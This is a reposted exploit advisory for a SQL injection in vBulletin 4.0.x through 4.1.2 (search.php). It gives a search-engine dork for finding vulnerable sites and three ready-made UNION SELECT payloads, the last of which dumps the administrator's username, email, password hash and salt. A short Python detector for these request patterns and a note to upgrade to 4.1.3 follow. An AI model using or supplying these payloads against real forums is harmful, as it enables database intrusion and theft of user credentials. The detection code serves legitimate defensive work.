====================================================================
#vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability#
====================================================================
#PhilKer - PinoyHack - RootCON - GreyHat Hackers - Security Analyst#
====================================================================

#[+] Discovered By : D4rkB1t
#[+] Site : NaN
#[+] support e-mail : d4rkb1t@live.com

Product: http://www.vbulletin.com
Version: 4.0.x
Dork : inurl:"search.php?search_type=1"

--------------------------
# ~Vulnerable Codes~ #
--------------------------
/vb/search/searchtools.php - line 715;
/packages/vbforum/search/type/socialgroup.php - line 201:203;

--------------------------
# ~Exploit~ #
--------------------------
POST data on "Search Multiple Content Types" => "groups"

&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#

More info: http://j0hnx3r.org/?p=818

--------------------------
# ~Advice~ #
--------------------------
Vendor already released a patch on vb#4.1.3.
UPDATE NOW!
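
A detection check for the request pattern above, as an added example that is not part of the original advisory: it flags POST bodies sent to search.php in which any cat[...] value is not a plain integer. That category ids are decimal integers is an assumption, the function names are illustrative, and the sample requests are constructed.

```python
import re
from urllib.parse import parse_qsl

# Assumption: legitimate category ids in cat[...] are plain decimal integers.
CAT_KEY = re.compile(r"cat\[[^\]]*\]")
INT_VALUE = re.compile(r"[0-9]+")


def suspicious_cat_params(post_body):
    """Return (key, value) pairs for cat[...] fields whose value is not an integer."""
    hits = []
    # parse_qsl URL-decodes keys and values, so encoded and raw bodies compare alike.
    for key, value in parse_qsl(post_body.lstrip("&"), keep_blank_values=True):
        if CAT_KEY.fullmatch(key) and not INT_VALUE.fullmatch(value.strip()):
            hits.append((key, value))
    return hits


def scan(requests):
    """requests: iterable of (path, body) for POSTs. Return findings for search.php."""
    findings = []
    for path, body in requests:
        # Ignore the query string when matching the script name.
        if not path.split("?", 1)[0].endswith("/search.php"):
            continue
        for key, value in suspicious_cat_params(body):
            findings.append({"path": path, "param": key, "value": value})
    return findings


# Constructed sample POST requests (not captured traffic).
SAMPLES = [
    ("/search.php?search_type=1", "query=test&cat[0]=1&cat[1]=7"),
    ("/search.php?search_type=1", "query=test&cat[0]=1) UNION SELECT database()#"),
    ("/search.php?search_type=1",
     "query=x&cat%5B0%5D=1%29+UNION+SELECT+database%28%29%23"),
    ("/forum.php", "cat[0]=abc"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLES):
        print(finding)
```

The same integer-only rule applies server-side as input validation on unpatched installs; the vendor patch remains the actual fix.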
This article is reposted from the enables 51CTO blog. Original link: http://blog.51cto.com/niuzu/580967. To repost it, please contact the original author.